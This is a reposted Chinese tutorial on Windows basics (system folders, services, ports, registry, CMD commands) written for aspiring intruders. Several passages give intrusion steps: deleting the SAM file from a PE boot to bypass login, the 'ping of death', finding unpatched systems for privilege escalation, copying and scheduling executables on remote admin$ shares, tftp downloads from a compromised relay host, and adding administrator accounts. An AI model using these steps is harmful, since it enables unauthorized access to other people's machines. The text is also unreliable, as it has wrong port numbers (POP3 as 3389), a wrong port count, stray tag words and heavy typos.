四.Windows基礎

時間 2019-11-17

標籤 windows 基礎欄目 Windows 简体版

原文原文鏈接

系統目錄web

Windowssql

Program files數據庫

用戶windows

Perflogs：是Windows7的日誌信息，如磁盤掃描錯誤信息，刪掉能夠，但不建議刪，刪掉反而下降系統速度，perflogs是系統自動生成的。緩存

注意：Windows-->system32-->sam //存放系統帳號密碼的文件！安全

若是想在不知道密碼的狀況下進入一臺電腦，咱們可使用PE先進入，找sam文件將他刪除，或者拷走。這樣進入電腦時就不須要密碼了。服務器

系統是64位的，會自帶x86目錄，要安裝32位的程序，則會安裝在這裏。網絡

服務oracle

服務是一種應用程序類型，它在後臺運行。服務應用程序一般能夠在本地和經過網絡爲用戶提供一些功能，例如客戶端/服務器應用程序、web服務器、數據庫服務器已經其餘基於服務器的應用程序。ssh

根據端口區分服務！

服務的做用：服務決定了計算機的一些功能是否被啓用，不一樣服務對應的功能不一樣。經過計算機提供的服務能夠有效實現資源共享。

常見的服務：Web服務，dns服務（解析域名），dhcp服務（分發ip），郵件服務，Telnet服務（遠程鏈接，和nc差很少），ssh服務，ftp服務，smb服務（文件共享）。

用telnet遠程登錄：

前提條件：1.處於同一網段的內網主機 2.主機有公網ip

Windows2003開啓telnet服務。

從Windows7開始，啓動telnet換了方式，具體方式以下：

這樣就能夠用telnet鏈接03虛擬機了。

端口

能夠認爲是計算機與外界通信交流的出口，按端口號分爲3大類：公認端口；註冊端口；動態/私用端口。一共有66535個端口

做用：一臺擁有ip地址的主機能夠提供許多服務，這些服務都是經過一個ip地址來實現的，那麼其實是經過ip地址+端口號來區分不一樣服務的。

端口並非一一對應的。好比：一臺www服務器使用80端口，但客戶端可使用不一樣於80端口的其餘端口進行訪問。

常見端口（重點，記！）

HTTP協議代理服務器經常使用端口號：80/8080/3128/8081/9080
FTP（文件傳輸）協議代理服務器經常使用端口號：21

3.Telnet（遠程登陸）協議代理服務器經常使用端口號：23

4.TFTP（trivial file transfer protocol），默認端口號爲69/udp

5.SSH（安全登陸），SCP（文件傳輸），端口重定向，默認的端口爲22/tcp

6.POP3 Post Office Protocol（E-mail），默認的端口號爲3389

7.TOMCAT，默認的款口號爲8080

8.win 2003 遠程登錄，默認的端口號爲3389

9. oracle數據庫，默認端口號1521

10.sql sever 數據庫默認端口：1433/tcp 1433/udp

11.qq 默認端口號爲 1080/tcp

經過端口：信息蒐集，目標探測，服務判斷，系統判斷，系統角色分析。

註冊表

註冊表是microsoft windows中的一個重要的數據庫，用於存儲喜用和應用程序的設置信息，在windows 3.0退出OLE技術的時候，註冊表就已經出現，雖

有推出的windows NT是第一個從系統級別普遍使用註冊表的操做系統，可是從microsoft windows 95開始，註冊表才真正成爲windows用戶常常接觸的

內容，並在其後的操做喜用中繼續沿用至今。

打開註冊表--

Win+r,輸入regedit，就能夠打開註冊表

在這個編輯器中們首先會出現這五個根鍵，在這幾個根鍵下則是無窮多的小文件夾彼此嵌套，徹底掌握是一件不實際的事情。

註冊表的做用——

註冊表示windows操做喜用中的一個革新數據庫，其中存放着各類參數，直接控制着windows的啓動，硬件驅動程序的裝載以及一些windows應用程序的運行，從而在整

個喜用中起着核心做用，這些做用包括了軟件，硬件的相關配置和狀態信息，好比註冊表中保存有應用程序和資源管理器外科的初始條件，首選項和寫在數據等，聯網

計算機的整個系統的設置和各類許可，文件擴展名與應用程序的關聯，硬件部件的描述，狀態和屬性，性能記錄和其餘底層的習用狀態信息，以及其餘數據等。

註冊表結構——

1， HKEY_CLASSES_ROOT

管理文件做用，根據在windows中安裝的應用稱洗的擴展名，此根鍵指明其文件類型的名稱，相應打開該文件所要調用的程序等等信息

2， HKEY_CURRENT_USER

管理系統當前的用戶信息，在這個根鍵中保存了本地計算機中存放的當前登錄的用戶信息，包括用戶登陸用戶名和密碼，在用戶登陸windows 98時，其信息從HKEY _USERS中相應的項拷貝到HKEY——CURRENT_USER中

3， HKEY_LOCAL_MACHINE

管理當前系統硬件配置，在這個根鍵中保存了本地計算機硬件配置數據，此根鍵下的子關鍵字包括在SYSTEM.DAT中，用來提供HKEY_LOCAL_MACHINE所需的信息，或者在遠程計算機中可訪問的一組鍵中

這個根鍵裏面的許多子鍵與system.ini文件中的設置項相似

4，HKEY_USERS

管理系用的用戶信息，在這個根鍵中保存了存放在本地計算機口令列表中的用戶標識和密碼列表，同時每一個用戶的預配置信息都存儲在HYEY_CURRENT_USERS根鍵中，HKEY_USERS是遠程計算機中訪問的根鍵之一。

5，HKEY_CURRENT_CONFIG

管理當前用戶的稀土永備至，在這個根鍵中保存着定義當前用戶桌面配置（如顯示器等等）的數據，該用戶使用過的文檔列表（MRU），應用程序配置和其餘有關當前用戶的windows 98 中文版的安裝信息。

利用註冊表防病毒——

很多計算機系統感染了網絡病毒後，可能會在這些註冊表中做出修改

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce\

下次開機運行，而且只運行一次的項

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

開機自動啓動的項

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

網上有不少註冊表入侵的例子！

DOS命令

Color：改變cmd顏色

在DOS中輸入color ？，而後命令行會自動刷出一個列表，標明每一個代碼對應的顏色，而後就輸入color，空格，再加上對應代碼，就能把命令行中字符的顏色改爲對應顏色。

一次性輸入了兩個字符，那麼第一個字符會變成背景顏色，第二個字符會變成字體顏色。

Ping -t -l 65500 <IP>

死亡ping（發送大於64k的文件並一直ping就成了死亡之ping）

Ping,-t,-l,65500和IP地址之間，都有空格隔開，從字面來拆分看，「ping」是這個指令的行爲，「-t」就是命令不停，「-l」指IP結尾斷點，IP不用解釋了你們都懂.

在這裏的65500，就是在讓這個數據包儘量的大，固然在真正的dos命令行中，若是輸入了無效的數字，命令行會提示你輸入範圍必須在0到65500之間

TTL的意義在於，幫助判斷操做系統，肯定還能經過多少路由。

ipconfig

查看網卡全部的參數

ipconfig/all 能夠查看關於網卡更詳盡的參數

ipconfig/release 釋放掉如今已經有的ip

ipconfig/renew 從新得到ip

systeminfo

顯示這個主機的各個信息，包括各類硬件和軟件。

能夠查看補丁，經過沒打的補丁找到系統漏洞。

這個在提權的時候會用到，查看系統打了哪些補丁，跟提權工作對比，返現沒有打的補丁，能夠進行提權。

局域網入侵

arp -a

用於遍歷各個接口下的IP地址

Net view 查看局域網其餘計算機名稱

Shutdown -s -t 180 -c 「Da4er」

-s 關機 -r 重啓 -c+提示語句 -t+時間

shutdown -a 取消

cls 清屏

dir 查看目錄

cd 切換目錄

進入d盤：d:這樣便可

start 打開文件或網址

copy con d:\123.txt 建立123.txt

hello word

ctrl+z 回車

Rd 123 刪除文件夾

Ren 原文件名新文件名重命名文件名

Del 刪除文件

Copy 複製文件

Move 移動文件

Tree 顯示目錄樹

Net start 查看開啓了哪些服務

Net start 服務名開啓服務

Net stop 服務名中止服務

netstat -a 查看開啓了哪些端口,經常使用netstat -an

netstat -n 查看端口的網絡鏈接狀況，經常使用netstat -an

netstat -v 查看正在進行的工做

netstat -p 協議名例：netstat -p tcq/ip 查看某協議使用狀況（查看tcp/ip協議使用狀況）

netstat -s 查看正在使用的全部協議使用狀況

nbtstat -A ip 對方136到139其中一個端口開了的話，就可查看對方最近登錄的用戶名（03前的爲用戶名）-注意：參數-A要大寫

tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。

ping ip(或域名) 向對方主機發送默認大小爲32字節的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。

ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)

ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數「/all」顯示所有配置信息

tlist -t 以樹行列表顯示進程(爲系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)

kill -F 進程名加-F參數後強制結束某進程(爲系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)

del -F 文件名加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔之外的文件。例如「DEL/AR *.*」表示刪除當前目錄下全部只讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件之外的全部文件

del /S /Q 目錄或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的全部子目錄和文件。同時使用參數/Q 可取消刪除操做時的系統確認就直接刪除。（二個命令做用相同）

move 盤符\路徑\要移動的文件名　存放移動文件的路徑\移動後文件名移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋

fc one.txt two.txt > 3st.txt 對比二個文件並把不一樣之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令

at id號開啓已註冊的某個計劃任務

at /delete 中止全部計劃任務，用參數/yes則不須要確認就直接中止

at id號 /delete 中止某個已註冊的計劃任務

at 查看全部的計劃任務

at \\ip time 程序名(或一個命令) /r 在某時間運行對方某程序並從新啓動計算機

finger username @host 查看最近有哪些用戶登錄

telnet ip 端口遠和登錄服務器,默認端口爲23

open ip 鏈接到IP（屬telnet登錄後的命令）

telnet 在本機上直接鍵入telnet 將進入本機的telnet

copy 路徑\文件名1　路徑\文件名2 /y 複製文件1到指定的目錄爲文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件

copy c:\srv.exe $">\\ip\admin$Content$nbsp;複製本地c:\srv.exe到對方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件

copy $\svv.exe">\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 複製對方admini$共享下的srv.exe文件（全部文件）至本地C：

xcopy 要複製的文件或目錄樹　目標地址\目錄名複製文件和目錄樹，用參數/Y將不提示覆蓋相同文件

tftp -i 本身IP(用肉機做跳板時這用肉機IP) get server.exe c:\server.exe 登錄後，將「IP」的server.exe下載到目標主機c:\server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送

tftp -i 對方IP　put c:\server.exe 登錄後，上傳本地c:\server.exe至主機

ftp ip 端口用於上傳文件至服務器或進行文件操做，默認端口爲21。bin指用二進制方式傳送（可執行文件進）；默認爲ASCII格式傳送(文本文件時)

route print 顯示出IP路由，將主要顯示網絡地址Network addres，子網掩碼Netmask，網關地址Gateway addres，接口地址Interface

arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出所有信息

start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令

mem 查看cpu使用狀況

attrib 文件名(目錄名) 查看某文件（目錄）的屬性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的存檔，只讀，系統，隱藏屬性；用＋則是添加爲某屬性

dir 查看文件，參數：/Q顯示文件及目錄屬系統哪一個用戶，/T:C顯示文件建立時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間

date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而沒必要輸入新日期和時間

set 指定環境變量名稱=要指派給變量的字符設置環境變量

set 顯示當前全部的環境變量

set p(或其它字符) 顯示出當前以字符p(或其它字符)開頭的全部環境變量

pause 暫停批處理程序，並顯示出：請按任意鍵繼續....

if 在批處理程序中執行條件處理（更多說明見if命令及變量）

goto 標籤將cmd.exe導向到批處理程序中帶標籤的行（標籤必須單獨一行，且以冒號打頭，例如：「：start」標籤）

call 路徑\批處理文件名從批處理程序中調用另外一個批處理程序（更多說明見call /?）

for 對一組文件中的每個文件執行某個特定命令（更多說明見for命令及變量）

echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置

echo 信息在屏幕上顯示出信息

echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中

findstr "Hello" aa.txt 在aa.txt文件中尋找字符串hello

find 文件名查找某文件

title 標題名字更改CMD窗口標題名字

color 顏色值設置cmd控制檯前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白

prompt 名稱更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改成：EntSky\ )

print 文件名打印文本文件

ver 在DOS窗口下顯示版本信息

winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名）

format 盤符 /FS:類型格式化磁盤,類型:FAT、FAT3二、NTFS ,例：Format D: /FS:NTFS

replace 源文件　要替換文件的目錄替換文件

ren 原文件名　新文件名重命名文件名

tree 以樹形結構顯示出目錄，用參數-f 將列出第個文件夾中文件名稱

type 文件名顯示文本文件的內容

more 文件名逐屏顯示輸出文件

doskey 要鎖定的命令＝字符

doskey 要解鎖命令= 爲DOS提供的鎖定命令(編輯命令行，從新調用win2k命令，並建立宏)。如：鎖定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解鎖：

doskey dir=

taskmgr 調出任務管理器

chkdsk /F D: 檢查磁盤D並顯示狀態報告；加參數/f並修復磁盤上的錯誤

tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就能夠更改telnet服務默認端口23爲其它任何端口

exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe

path 路徑\可執行文件的文件名爲可執行文件設置一個路徑。

cmd 啓動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啓命令擴展；更我詳細說明見cmd /?

regedit /s 註冊表文件名導入註冊表；參數/S指安靜模式導入，無任何提示；

regedit /e 註冊表文件名導出註冊表

cacls 文件名　參數顯示或修改文件訪問控制列表（ACL）——針對NTFS格式時。參數：/D 用戶名:設定拒絕某用戶訪問；/P 用戶名:perm 替換指定用戶的訪問權限；/G 用戶名:perm 賦予指定用戶訪問權限；Perm 能夠是: N 無，R 讀取， W 寫入， C 更改(寫入)，F 徹底控制；例：cacls D:\test.txt /D pub 設定d:\test.txt拒絕pub用戶訪問。

cacls 文件名查看文件的訪問用戶權限列表

REM 文本內容在批處理文件中添加註解

重點

net user 用戶名密碼 /add 建立用戶

net user guest /active:yes 激活guest(來賓用戶)

net user 查看有哪些用戶

net user 帳號名查看帳號的屬性

net localgroup administrators 用戶名 /add 把"用戶"添加到管理員中使其有管理員的權限

net password 密碼更改系統登錄密碼

net share 查看本地開啓的共享

經常使用的windows服務

DHCP服務